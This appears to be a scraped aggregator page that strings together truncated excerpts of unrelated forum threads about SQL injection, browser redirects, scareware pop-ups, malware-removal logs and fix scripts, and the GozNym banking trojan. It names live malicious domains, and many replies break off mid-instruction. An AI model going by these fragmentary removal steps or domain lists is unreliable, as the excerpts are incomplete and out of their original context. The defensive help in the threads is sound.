Tech Problem Aggregator

visiting Compromised websites -SQL Injection ATTACKS

Q: visiting Compromised websites -SQL Injection ATTACKS

is it safe to visit a website that has been attacked with SQL injection? ..as an example google www.wowyeye.cn www.killwow1.cn and look at the websites that have been compromised by these Chinese domains, if by chance if you surf to a site "taken over" can that website with the attack host files be downloaded to your browser?

A: visiting Compromised websites -SQL Injection ATTACKS

6 more replies
Answer Match 98.28%

Quote:
Security researchers warn that websites hosted at Go Daddy are currently targeted in mass injection attacks, that add rogue code to their pages and direct visitors to scareware.
...


Websites Hosted at Go Daddy Under Siege in Mass Injection Attacks - Softpedia

A:Websites Hosted at Go Daddy Under Siege in Mass Injection Attacks

Thanks for the heads up. My company's website is hosted through GoDaddy, so I'll keep an eye on my code.

1 more replies
Answer Match 81.9%

I'm pretty sure I've been hit with something, but I'm not sure how to trace it down.
 
I need to try to identify what it is so I can make sure i know what they were looking for. 
 
Here's one of the only screenshots Ive been able to grab of the offending software.
 
http://imgur.com/a/WMJVL
 
It appears to customize what is displayed based upon GeoIP.
 
Where do I begin? I haven't done malware removal in depth since XP SP2.
 
Thanks,

Booty
 
 

More replies
Answer Match 76.86%

My server encountered SQL Injection Acctacks. Please, somebody, recommend an intrusion detection tool. Thanks in advanced!

A:How to Detect SQL Injection Attacks

Using Database Caches to Detect SQL injection - To Cache a ThiefHow to detect and stop SQL injection attacksSQL Inject-Me to test for SQL Injection vulnerabilities - SQL Inject-Me FAQsFinding SQL Injection with HP ScrawlrScrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities...Download HP ScrawlrFree Edition of Acunetix Web Vulnerability ScannerOnline Tools: SQL Injection Vulnerability TestEdit: Fixed link

2 more replies
Answer Match 76.02%

Steve Friedl, Microsoft MVP, developed an awesome and highly detailed article on how SQL Injection attacks work. DBAs and System Administrators need to be on the latest and greatest SPs and security updates for SQL-Server and other RDBMS's. Excellent Article: SQL Injection Attacks by Examplehttp://www.unixwiz.net/techtips/sql-injection.htmlSQL Injection is caused by unverified/unsanitized user input, and its main idea is to convince the application to run SQL code that it was not intended to run. If the application is creating SQL strings natively, i.e. on the fly, and then running them, it's straightforward to create some real surprises. There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.

More replies
Answer Match 66.36%

  
Quote: Originally Posted by Casuaisxtynine


Really really random bsod's. help please! :<


This is a repost.. I'm sorry for this but I need help

A:BSOD - Visiting websites

Hi Casuaisxtynine.

Click on the button below ....



It will download the DM log collector. Right click on the application and run as administrator. It will generate a .zip file on your desktop. Upload the .zip.
Screenshots and Files - Upload and Post in Seven Forums

9 more replies
Answer Match 66.36%

Really really random bsod's. help please! :<

A:BSOD - Visiting websites.

Code:
BugCheck 116, {fffffa80046bb010, fffff88003bb045c, 0, 2}
This bugcheck indicates that an attempt to reset the display within the allocated time interval failed, hence the bugcheck.
This isn't a typical bugcheck in terms that this only happens when the graphics card doesn't respond either because of a bad driver or the GPU is faulty.


Code:
2: kd> KnL
# Child-SP RetAddr Call Site
00 fffff880`05a7a1c8 fffff880`0414b054 nt!KeBugCheckEx <-- The BSOD crash
01 fffff880`05a7a1d0 fffff880`0414ad5e dxgkrnl!TdrBugcheckOnTimeout+0xec <-- Instruction telling the system to crash if the graphics card doesn't respond.
02 fffff880`05a7a210 fffff880`0400ff13 dxgkrnl!TdrIsRecoveryRequired+0x1a2 <-- Telling the system to run a display recovery.
03 fffff880`05a7a240 fffff880`0403ded6 dxgmms1!VidSchiReportHwHang+0x40b <-- This reports the graphics card has hung.
04 fffff880`05a7a320 fffff880`04023ce9 dxgmms1!VidSchWaitForCompletionEvent+0x196
05 fffff880`05a7a360 fffff880`04026be7 dxgmms1!VIDMM_GLOBAL::xWaitForAllEngines+0x1e9
06 fffff880`05a7a460 fffff880`040252d8 dxgmms1!VIDMM_GLOBAL::SetupForBuildPagingBuffer+0xd7
07 fffff880`05a7a4a0 fffff880`0402522e dxgmms1!VIDMM_GLOBAL::UnmapVideoApertureSegmentInternal+0x34
08 fffff880`05a7a630 fffff880`0402e77e dxgmms1!VIDMM_GLOBAL::UnmapVideoApertureSegment+0x13e
09 fffff880`05a7a6a0 fffff880`0402e527 dxgmms1!VIDMM_APERTURE_SEGMENT::UnmapApertureRange+0x7a
0a fffff880`05a7a6f0 ff... Read more

8 more replies
Answer Match 66.36%

Hello all,
I am having a problem with all of the browsers on my computer directing to a spam search site when I try to visit certain websites.

I believe the problem started when I installed this software to help me switch audio output very easily:
http://www.sevenforums.com/customization/65079-anyway-use-hotkeys-switch-sound-output.html

I've done the following:
1) Run updated Malware bytes Anti Malware
2) Run TDSS Rootkit Remover Tool by Kaspersky.
3) Run Virus Remover Tool by Kaspersky.
4) Reset my cookies in Chrome.
5) Read the "Before posting a log" on this forum (the sticky post).
6) Updated my notification options as recommended.
I could not run GMER as I'm running Windows 7 64 bit.

I've attached my DDS/Attach/Hijack logs.
.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 8.0.7600.16385
Run by Nublard at 12:30:59 on 2011-11-19
Microsoft Windows 7 Ultimate 6.1.7600.0.1252.1.1033.18.8187.6350 [GMT -5:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestr... Read more

A:Redirecting When Visiting Websites

Hi,

you mentioned running a number of tools in the beginning, did they all come back clean? I'd be in particular interested in the tdsskiller log.

regards myrti

12 more replies
Answer Match 65.94%

I have a:
Gateway laptop Gateway Laptop
MX6433
AMD Turion 64 mobile
Technology ML-30
1.59 GHz, 448 MB of RAM
Windows XP Media Center edition (service pack 3).

I bought it two years or so ago. Since as long as I can remember I have had this problem.

when I am on my browser (I use chrome, firefox, and IE) my wireless connection will cut out after a while. I have noticed that if I am on just one site (example: Pandora.com) it can be fine for hours. But once I start going to different sites, I eventually get kicked off. It can be any website, Facebook, youtube, etc.

When I lose connectivity, I refresh my wireless connections and only the printer comes up. If I try to right click on the tray icon to repair internet connection, it freezes. I am guessing that this is a hardware problem. (?) Though I'm not extremely technical with computers, I know my way around most issues that can arise.

I have reformatted my hard drive (twice) and all my software is up to date. I have run AVG scan and Ad Aware scan hundreds of times. Can anyone offer assistance? Thank you very much!
 

More replies
Answer Match 65.94%

I am rephrasing the question to be more specific. I cannot see how my first request was inappropriate. I have not needed to set up a network in years, so I hope someone has the answer to my question.

I am paying for my home internet, and I do not want anyone visiting pron websites. Is their any tool that can alert me if one of my friends is accessing inappropriate material on the website. Someone closed my question before, so I guess knowing how to share their internet histories is NOT the proper answer.

I will not stand for people looking at bad websites, so I hope someone can point me to a decent solution.
 

A:I need to make sure users are not visiting bad websites

6 more replies
Answer Match 65.94%

We recently added a filter to our computer because of our children. Each week we get a report on sites that we attempted to be opened, but are blocked. There are several, but one in particular is on there all the time and has a high percentage. I am wondering if anyone recognizes it and if it is possible that somehow there is something on our computer that is automatically leading us there. We have not gone to it ever as far as I know.

It is: eserviceds1x.us.dell.com

We have both AdAware SE and Spybots and run them regularly.

Below is our Hi-Jack this latest run:
Logfile of HijackThis v1.98.2
Scan saved at 11:49:24 AM, on 10/13/2004
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\SoftwareDistribution\Download\Install\873374_eng.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\BCMSMMSG.exe
C:\Program Files\MUSICMATCH\MUSICMATCH Jukebox\mm_tray.exe
C:\PROGRA~1\NORTON~1\navapw32.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\Roxio\Easy C... Read more

A:Websites visited that we aren't visiting??

Hi MNgirl,

1 Download LSPFix from http://www.cexx.org/lspfix.htm .

2 Create a permanent folder like C:\Program Files\LSP and extract the download zip file into that folder.

3 Log your computer in safe mode (hit F8 many times during booting procedure);

4 Disable your System Restore : have a look to Disabling or enabling Windows XP System Restore ;

5 Close all open windows - it is very important;

6 Run LSPFix : click only the Fix button;

7 Reboot normally and post a new HijackThis log.
 

3 more replies
Answer Match 65.1%

I've been able to run a few scanners, Avast!, Spybot S&D, AVG, etc- spybot found a few things, and deleted them. The online webscanners like panda and trend micro won't allow me to goto the sites, because whatever the virus is takes me to another site/weberror even if I type it straight into the adress bar. I ran stinger and it found no errors, following is my hijackthis logfile.Logfile of Trend Micro HijackThis v2.0.2Scan saved at 2:37:14 PM, on 9/15/2008Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16705)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\nvsvc32.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Viewpoint\Common\ViewpointService.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Analog Devices\Core\smax4pnp.exeC:\Program Files\Analog Devices\SoundMAX\Smax4.exeC:\WINDOWS\system32\RUNDLL32.EXEC:\Program Files\Common Files\Real\Update_OB\realsched.exeC:\Program Files\Spy... Read more

A:Doesn't Allow Visiting Of Anti-spyware Websites

Hello Shoyu,

Welcome to Bleeping Computer

Sorry about the delay. If you still need help, please post a new HijackThis log to make sure nothing has changed, and I'll be happy to look at it for you.

Thanks,
tea

2 more replies
Answer Match 65.1%

Hey guys,

I have a friend who has an adult filtering program on his computer. I get a daily email with all of the sites his computer goes to. I know that they are not visiting these sites personally, so, there has to be some malware/adware that is causing it. I also learned today that there are a number of popups, probably related to these sites.

The websites are:

msn.com yahoo.com, foxsports.com, youtube.com, yimg.com, microsoft.com, facebook.com, gamevance.com, conduitservices.com
Also - it has been running slower as of late.

Thanks for the help.

Jeremy

A:Vista Laptop - visiting certain websites automatically every day

I hate to use the word "Bump," but, I just wanted to send out a reminder....

6 more replies
Answer Match 64.26%

OS = Windows 10, effects all browsers used (slimbrowser, slimjet, IE11, Firefox w/noscript running, Chrome, Opera, these are the only ones i tried)
 
When browsing to a website (typically seems to be stream2watch) but others randomly trigger a message that informs me to call my ISP to remove malware, and a fake blue screen error withing a browser windows behind that. This can only be terminated by ending the task within task manager. ALT+F4 does nothing, just sends it repeating.
 
I have Secure A Plus running along with Superantispyware, both have run a full scan and to no avail minus piddly tracking cookies in SAS. ADW cleaner also has been run after the fact. No repeat customer seem to appear.
 
I have a screen capture if you would like to see it, and hope to get this resolved, it gets very irritating. Thank you
 
 

A:Possible malware informs me to contact ISP when Visiting websites to remove it

Download Security Check from here or here and save it to your Desktop. Double-click SecurityCheck.exe Follow the onscreen instructions inside of the black box. A Notepad document should open automatically called checkup.txt; please post the contents of that document.NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdateWindows DefenderOther ServicesPress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply. Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeList Restore PointsClick Go and post the result. Please download Malwarebytes Anti-Malware (MBAM) to your desktop.NOTE. If you already have MBAM 2.0 installed scroll down.Double-click ... Read more

20 more replies
Answer Match 64.26%

Upon visiting websites, a pop up comes up (screenshot available upon request) informing me to contact my ISP (which is the correct one) and a phone number to call. Some annoying voice also speaks this and can only be terminated via the task manager. Everything that has been done so faris outlined in previous correspondence here: http://www.bleepingcomputer.com/forums/t/590600/possible-malware-informs-me-to-contact-isp-when-visiting-websites-to-remove-it/
 
All browsers are affected and seems to be triggered mostly by stream2watch.com but is not limited to there as I get the message randomly on other sites (ESPN, CNN, Bleeping computer included)
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:15-09-2015
Ran by justin (administrator) on ROCKHOUSE-PC (20-09-2015 05:23:17)
Running from C:\Users\justin\Downloads\Virus Removal Tools 9.16.15 in order
Loaded Profiles: justin &  (Available Profiles: justin & Administrator)
Platform: Windows 10 Pro (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Codebox Software) C:\Program Files (x86)\C... Read more

A:Possible malware informs me to contact ISP when Visiting websites to remove it

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Press the windows key + r on your keyboard at the same time. This will open the RUN BOX.Type Notepad and and click the OK key.Please copy the entire contents of the code box below to the a new file.

start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Ammyy LLC) C:\Users\justin\Downloads\AA_v3.exe
HKLM\...\Policies\Explorer\Run: [Mpk.exe] => C:\Program Files (x86)\KGB\Mpk.exe
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR HKU\S-1-5-21-1106552174-2026213447-2673983111-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1106552174-2026213447-2673983111-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
OPR Extension: (No Name) - C:\Users\justin\AppData\Roaming\Opera Software\Opera Stable\Extensions\mhgklikgljbhnomlmhmondmafldgmojo [2015-08-31]
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe &... Read more

16 more replies
Answer Match 64.26%

As the title states, after visiting some potentially dangerous websites, my laptop is acting a little strange. I'm concerned that a trojan virus or the like may be capturing my data/passwords. I would greatly appreciate any assistance! Below is my generated  FRST.txt log:
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-06-2016 02
Ran by Oracle (administrator) on ORACLE-PC (06-06-2016 15:14:36)
Running from C:\Users\Oracle\Desktop
Loaded Profiles: Oracle & UpdatusUser (Available Profiles: Oracle & UpdatusUser)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Atheros ... Read more

A:Suspicious behaviour on laptop after visiting questionable websites

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Remove this program via the Control Panel > Programs > Programs and Features applet.Driver Downloader v3.2 (HKLM-x32\...\Driver Downloader_is1) (Version: 3.2 - PDE Publications Limited)===Press the windows key + r on your keyboard at the same time. This will open the RUN BOX.Type Notepad and and click the OK key.Please copy the entire contents of the code box below to the a new file. start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(PDE Publications Limited) C:\Program Files (x86)\Driver Downloader\DDTray.exe
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-1473783762-3503634554-1593080487-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK => not found
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-06-02] <==== ATTENTION
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.102\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\50... Read more

0 more replies
Answer Match 61.32%

Hi guys, I'm new to this forum; But I recently encountered a problem while injecting a .dll into a program. The error message is what the title says and I tried a lot of injectors and it returned the same error.

Here's what I tried:
Upgraded windows 8.1 to 10
Unblocked the DLL
Different injection methods

None of these worked, help would be appreciated.
Thanks

A:[DLL] Injection Method used returned NULL (Injection failed).

Bump.

0 more replies
Answer Match 60.48%

Hi,

Sorry for delayed response. Forums have been really busy. If you still need help with this post a fresh dds log, please.

A:Infected with DOS That Attacks certain websites (?)

Due to inactivity, this thread will now be closed. If you need this topic reopened, please contact a Staff member. Include the address of this thread in your request. This applies only to the original topic starter. Should you have a new issue, please start a New Topic.

2 more replies
Answer Match 59.22%

Norton keeps telling me it's blocking attacks from these websites:67b6b6b6.comIK01ha711g1.cczl091kha644.com91jjak4555j.com195.206.246.21634jh7alm94.asiaI've run full scans with Malware Bytes and Norton security suite. Malware bytes detected 10 infected objects and removed them, but the attacks still continued.DDS (Ver_10-03-17.01) - NTFSx86 Run by Max at 16:54:08.99 on Fri 09/17/2010Internet Explorer: 6.0.2900.2180 BrowserJavaVersion: 1.6.0_13Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.2047.974 [GMT -6:00]AV: Norton Security Suite *On-access scanning enabled* (Updated) {E10A9785-9598-4754-B552-92431C1C35F8}FW: Norton Security Suite *enabled* {7C21A4C9-F61F-4AC4-B722-A6E19C16F220}============== Running Processes ===============D:\WINDOWS\system32\svchost -k DcomLaunchsvchost.exeD:\WINDOWS\System32\svchost.exe -k netsvcsD:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exesvchost.exesvchost.exeD:\WINDOWS\system32\spoolsv.exesvchost.exeD:\Program Files\Adobe\Photoshop Elements 6.0\PhotoshopElementsFileAgent.exeD:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exeD:\Program Files\Bonjour\mDNSResponder.exesvchost.exeD:\Program Files\Ultima\Drivers\2600\iExtDrvTools.exeD:\Program Files\Java\jre6\bin\jqs.exeD:\Program Files\Nor... Read more

A:Norton is constantly blocking attacks from various websites

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.Double click DeFogger to run the tool. The ap... Read more

19 more replies
Answer Match 59.22%

Hi all, my computer at work is extremely slow and is bombarded by attacks from what Malwarebytes calls possibly malicious websites.

00:04:03 Managers IP-BLOCK 212.117.160.204 (Type: outgoing)
00:04:12 Managers IP-BLOCK 188.40.69.203 (Type: outgoing)
00:08:45 Managers IP-BLOCK 98.142.248.182 (Type: incoming)
00:18:00 Managers IP-BLOCK 121.10.137.49 (Type: incoming)
00:18:00 Managers IP-BLOCK 121.10.137.49 (Type: incoming)
00:20:52 Managers IP-BLOCK 116.111.184.117 (Type: outgoing)
00:30:54 Managers IP-BLOCK 83.128.38.105 (Type: incoming)
01:03:45 Managers IP-BLOCK 194.165.0.6 (Type: outgoing)
01:03:53 Managers IP-BLOCK 222.76.133.71 (Type: outgoing)
01:29:33 Managers IP-BLOCK 58.240.74.235 (Type: incoming)
01:40:57 Managers IP-BLOCK 58.240.198.144 (Type: incoming)
01:51:07 Managers IP-BLOCK 89.28.96.102 (Type: incoming)
02:03:43 Managers IP-BLOCK 89.28.22.122 (Type: outgoing)
02:09:29 Managers IP-BLOCK 193.138.237.38 (Type: incoming)
02:17:21 Managers IP-BLOCK 206.53.53.142 (Type: outgoing)
02:18:13 Managers IP-BLOCK 59.34.2.162 (Type: outgoing)
02:24:51 Managers IP-BLOCK 188.130.177.20 (Type: incoming)
02:33:09 Managers IP-BLOCK 220.248.225.227 (Type: outgoing)
02:48:17 Managers IP-BLOCK 121.10.137.49 (Type: incoming)
03:03:51 Managers IP-BLOCK 212.113.33.128 (Type: outgoing)
03:03:53 Managers IP-BLOCK 58.240.74.235 (Type: incoming)
03:04:46 Managers IP-BLOCK 89.28.89.68 (Type: outgoing)
03:16:03 Managers IP-BLOCK 77.78.241.201 (Type: incoming)
03:18:11 Managers IP-BLOCK 121... Read more

A:Constant attacks from possibly malicious websites

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

63 more replies
Answer Match 58.8%

Sometime over the weekend, something must have gotten into my computer that Avast, ESET, Malwarebytes and SuperAntiSpyware are not finding. I believe it was on my laptop, but I think at this point both my laptop and desktop (and possibly an external drive that I use on both PCs) could be compromised.

It started with my attempt to login to an e-commerce store that I have been working on for a friend. The login page had a bunch of random code at the top of the site that was never there before. When I did login, it would randomly boot me out to the login page again when trying to add products to the store or images to products. The code on there right now at the top of the page is:

Warning: session_start() [function.session-start]: open(/services/webdata/php_sessions/sess_f2fead3b2577d2cef3eb580d02adcd14, O_RDWR) failed: No such file or directory (2) in /services/webpages/util/2/z/2zc3i26jm.myutilitydomain.com/blackenedmoon.com/public/store/system/library/session.php on line 10Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /services/webpages/util/2/z/2zc3i26jm.myutilitydomain.com/blackenedmoon.com/public/store/admin/index.php:72) in /services/webpages/util/2/z/2zc3i26jm.myutilitydomain.com/blackenedmoon.com/public/store/system/library/session.php on line 10

So I had a friend who is more well-versed in OpenCart checking into it and she couldn't figure anything besides perhaps a folder that stor... Read more

A:My FTP Store Login Info Compromised; Websites Hacked

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. To help Bleeping Computer better assist you please perform the following steps:*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resouce! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/414751 <<< CLICK THIS LINK If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.*************************************************** If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the low... Read more

22 more replies
Answer Match 49.98%

Esteemed Forum Members,

This is my first posting here. I am a Java programmer/developer. And I look forward to participating. Although I generally find that I learn more from reading the posts of the knowledgeable folks here than with me talking.

My current question is to see if anyone knows any more about a computer affliction that has affected two friends in the past week. (They are in different groups, so these are separate "afflictions".)

The two are remarkably similar so I am hypothesizing that they are basically the same attack. I suspect that if I have bumped into two of these cases, you folks may have already been there and done that.

As I don't have access to either of their computers, and as they are rather naive MSWindows users, it might be difficult for me to run the various diagnosic tools on their systems.

Basically the symptom is that they received an email from a known source. (Yeah, I know...) And clicked on a link to one of the {canxhealth health24x medhealthx xmedx } dotcom websites. The result is that, at a minimum, their Yahoo email account was compromised and an email was sent out to all of their contacts. The sent email has no subject and contains only the link to the malware website.

Googling through the web, I see suggestions ranging from changing the email account password through reformatting the hard-drive and resetting external routers. I also see claims that none of the major anti-virus/firewall applications detect this... Read more

A:Yahoo Account Compromised, possible system compromised

Hello Chuck, First i will move you one forum down to Am I Hacked.Please read the first pinned topic there, Who To Contact If Your Yahoo Webmail Account Is Hacked Next follow tese instructions,also a pinned topic there How to receive help in the Am I Hacked? forum

5 more replies
Answer Match 49.98%

Hello.  I seem to be sharing my firewall privileges with a remote hacker and a system restore didn't help.  A similar posting at Tom's Hardware pointed to a corrupted/malware rundll32.exe file creating extraneous malware files (guard.tmp, filename.dll) in his Win/System32 folder.  I suspect I have something similar though couldn't find those same file names.  (His posting is here: http://www.tomshardware.com/forum/134388-45-mysterious-rundll32-administrator-privileges )
 
I have tried kaspersky, combofix, rskiller, hitman, symantec, emsisoft, avg, symantec, windows defender, etc.  I am not a tech guy by trade but serve as my own IT guy some months so any help I get is welcome.  I probably am supposed to be posting "hijack this" findings or something as a first step but haven't done anything like that in 12 years so I figured I would post my problem first.  Thank you.

More replies
Answer Match 49.56%

The GozNym banking malware is coming to America with a fresh tactic.

Hackers combined code from two malware types, known as Nymaim and Gozi, to create the unholy hybrid dubbed GozNym?a franken-trojan, if you will. It was first spotted in April, and has since evolved: Its operators are testing redirection attacks on four of the largest banks in the United States and targeting their business accounts, according to IBM X-Force. Redirection attacks are most typically used with organized cybercrime that have the resources necessary to implement them.

The overall idea behind redirection attacks is to hijack malware-infected users, sending them to a website that looks exactly like their bank?s site. They then log into their ?account,? and their credentials are stolen on the fake site in real time, tested against the bank?s genuine home page and used to initiate a fraudulent money transfer out of the account.

?Moreover, the victim is kept on the fake website, where the attacker can push social engineering notifications to them, making them divulge personally identifiable information (PII) and two-factor authentication elements,? IBM researchers explained.

The firm added that the team behind GozNym has built its own special scheme designed to keep the attacks hidden from prying security researchers? eyes.

?To prepare a successful redirection attack, GozNym has a two-stage process in place,? IBM researchers said. ?At first, the malware redirects the victim to... Read more

More replies
Answer Match 44.94%

Hey, I believe I have malware on my computer, my friend told me about this site and told me to use combofix, I did. It told me that I had a few rootkits, it said to take care of them I had to reboot, then it did it again, I had to do that a total of 2 or 3 times, the last time it told me windows wasn't genuine, I just Xed out of it because it is genuine. I have the log, it told me it deleted the problems, but yet I'm still expierencing them. Whenever I search anything, not just on google, on bing, yahoo!, ask, alta vista, dog pile, any search engine, almost always norton pops up saying it blocked an attack. Ive been making my own personal log of things happening to my computer, I have attached it here just incase you might need more info on what's going on with my computer. And as I type this an attack was attempted by 1iii1i11i1ii.com resuleted from svchost.exe, ones that are resulted from that appear to be random, also it keeps trying to turn off User Account Controls, yesterday it was notifying me, today it is not, but I think combofix has deleted the rootkits causing that. I have also used malwarebytes. It found a malware packer and a keylogger. To make matters worse, Windows won't update.DDS (Ver_10-03-17.01) - NTFSx86 Run by Paul at 15:15:42.71 on Mon 06/21/2010Internet Explorer: 8.0.7600.16385Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3033.1725 [GMT -4:00]============== Running Processes ===============C:\Windows\system3... Read more

A:Search related attacks, redirects, and attacks related from svchost

